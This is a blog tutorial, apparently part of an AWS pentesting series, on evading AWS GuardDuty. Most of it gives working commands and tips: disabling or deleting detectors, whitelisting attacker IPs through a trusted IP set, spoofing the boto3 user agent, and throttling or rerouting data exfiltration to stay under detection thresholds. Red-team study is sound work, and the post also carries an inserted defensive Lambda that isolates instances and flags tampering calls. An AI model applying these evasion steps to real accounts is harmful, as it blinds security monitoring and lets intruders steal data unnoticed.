AWS Penetration Testing Part - 7: Bypassing AWS GuardDuty

March 17, 2025
Tags: AWS Security, Pentesting, GuardDuty

🔍 Pentesting and Bypassing AWS GuardDuty

AWS GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior. This post covers advanced red team techniques to understand, test, and bypass GuardDuty, making it an essential read for cloud security researchers and penetration testers.

🧠 Understanding GuardDuty

GuardDuty analyzes VPC flow logs, CloudTrail event logs, and DNS logs. Notably:

  • DNS logs are only analyzed if routed through AWS DNS.
  • Logs can be centrally monitored using a master account.
  • Detection is based on baselines built via machine learning.

Common finding categories include:

  • Reconnaissance
  • IAM privilege enumeration
  • Bitcoin mining pools
  • API calls from known hacking distros

For the complete list of finding types, see the AWS GuardDuty Finding Types documentation.


⚙️ Creating CloudWatch Event Rules for GuardDuty

To automate reactions to findings:

  1. Go to CloudWatch > Events > Create Rule
  2. Event source: GuardDuty
  3. Event type: GuardDuty Finding
  4. Add target: SNS/Lambda

Example use case:

A Lambda function triggered by a suspicious-domain-contact finding that automatically updates the instance's security group to block outbound traffic.

🛡️ Bypassing GuardDuty

❌ Disable Detectors (Destructive)

aws guardduty list-detectors
aws guardduty update-detector --detector-id <detector-id> --no-enable
aws guardduty delete-detector --detector-id <detector-id>

⚠️ Not recommended: noisy and easily noticed, since every one of these calls is logged in CloudTrail.


🧊 IP Whitelisting

Upload the attacker IP list to S3:

aws s3 cp ./ip-whitelist.txt s3://your-bucket
aws s3api put-object-acl --bucket your-bucket --key ip-whitelist.txt --acl public-read

Whitelist via a trusted IP set:

aws guardduty create-ip-set --detector-id <id> --name Whitelist --location https://s3.amazonaws.com/your-bucket/ip-whitelist.txt --format TXT --activate

Or update an existing list:

aws guardduty update-ip-set --detector-id <id> --ip-set-id <ip-set-id> --location https://... --activate

Automate with Pacu:

run guardduty_whitelist_ip --path https://s3.amazonaws.com/bucket/ip-whitelist.txt
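The CloudWatch event rule described earlier only pays off with a target behind it. The following Lambda handler is an added example, not code from the original post or from Pacu: it implements the "example use case" above (isolate the EC2 instance named in a finding by swapping in a restrictive security group) and, for the same rule fed with "AWS API Call via CloudTrail" events, escalates the GuardDuty API calls behind the detector-disable and IP-whitelist commands shown in the two preceding sections. The isolation security group and SNS topic are assumed to arrive as the environment variables ISOLATION_SG and ALERT_TOPIC; the sample events are constructed.

```python
import json
import os

# CloudTrail event names behind the tampering commands shown in this post
TAMPER_EVENTS = {"UpdateDetector", "DeleteDetector", "CreateIPSet", "UpdateIPSet"}

# Constructed sample events, shaped like what EventBridge delivers to Lambda
SAMPLE_FINDING = {"detail-type": "GuardDuty Finding", "source": "aws.guardduty",
                  "detail": {"type": "CryptoCurrency:EC2/BitcoinTool.B", "severity": 8,
                             "resource": {"resourceType": "Instance",
                                          "instanceDetails": {"instanceId": "i-0123456789abcdef0"}}}}
SAMPLE_TAMPER = {"detail-type": "AWS API Call via CloudTrail", "source": "aws.guardduty",
                 "detail": {"eventSource": "guardduty.amazonaws.com", "eventName": "UpdateDetector",
                            "requestParameters": {"detectorId": "<detector-id>", "enable": False},
                            "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}}}


def classify(event: dict) -> dict:
    """Decide what to do with one event; pure function so it can be tested offline."""
    detail = event.get("detail", {})
    if event.get("detail-type") == "GuardDuty Finding":
        inst = detail.get("resource", {}).get("instanceDetails", {}).get("instanceId")
        # Isolate only EC2-backed findings of Medium severity (4.0) or above
        if inst and float(detail.get("severity", 0)) >= 4:
            return {"action": "isolate", "instance_id": inst, "finding": detail.get("type")}
        return {"action": "log", "finding": detail.get("type")}
    if (event.get("detail-type") == "AWS API Call via CloudTrail"
            and detail.get("eventSource") == "guardduty.amazonaws.com"):
        name = detail.get("eventName")
        params = detail.get("requestParameters") or {}
        # UpdateDetector is also used for benign setting changes; flag it only when it disables
        disabling = name != "UpdateDetector" or params.get("enable") is False
        if name in TAMPER_EVENTS and disabling:
            return {"action": "escalate", "event": name,
                    "principal": detail.get("userIdentity", {}).get("arn")}
    return {"action": "ignore"}


def handler(event, context=None):
    """Lambda entry point. ISOLATION_SG and ALERT_TOPIC are assumed environment variables."""
    decision = classify(event)
    if decision["action"] == "isolate":
        import boto3  # imported lazily so classify() needs no AWS SDK
        boto3.client("ec2").modify_instance_attribute(
            InstanceId=decision["instance_id"], Groups=[os.environ["ISOLATION_SG"]])
    elif decision["action"] == "escalate":
        import boto3
        boto3.client("sns").publish(TopicArn=os.environ["ALERT_TOPIC"], Message=json.dumps(decision))
    return decision
```

The same rule needs a second event pattern (source aws.guardduty, detail-type "AWS API Call via CloudTrail") for the tampering branch to ever fire.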

🕵️ Bypass EC2 Credential Exfiltration Alerts

GuardDuty alert: UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration

✅ Solution

Launch your own EC2 instance and operate from there.

aws ec2 run-instances --image-id ami-... --instance-type t2.micro --key-name <your-key> --user-data file://userdata.txt

In userdata.txt:

#!/bin/bash
apt update && apt install python3 python3-pip git -y
pip3 install awscli
git clone https://github.com/RhinoSecurityLabs/pacu.git && cd pacu
bash install.sh

🧬 Bypass OS Detection

GuardDuty flags API calls made from known pentesting distributions such as:

  • Kali
  • Parrot
  • Pentoo

Modify the user agent:

import boto3
from botocore.config import Config

# Replace the default botocore user agent string with a generic-looking one
config = Config(user_agent='aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10')
client = boto3.client('ec2', config=config)

Pacu handles this automatically for you when creating a session.


💻 Other Techniques

📉 Crypto Alerts

Avoid known mining pool IPs to stay clear of the CryptoCurrency:EC2/BitcoinTool.B finding.

🌐 Port Behavior

Stick to common ports (80, 443) to bypass Behavior:EC2/NetworkPortUnusual.

📤 Traffic Volume

Slow your exfiltration to avoid Behavior:EC2/TrafficVolumeUnusual.

🧮 Resource Launch

Avoid the RunInstances API: use Glue dev endpoints, Lightsail, or AppStream instead.

🔐 Password Policy

Don't weaken it; changes trigger Stealth:IAMUser/PasswordPolicyChange.

📡 DNS Data Exfiltration

Avoid DNS-based data exfiltration if the instance uses AWS DNS, since those queries are the ones GuardDuty sees. Use alternate DNS resolvers to bypass.


✅ Summary

GuardDuty is powerful but limited. Awareness of what triggers alerts and how to bypass them is crucial in red team operations. Still, it is only part of the picture. Assume more advanced detections exist, and act accordingly.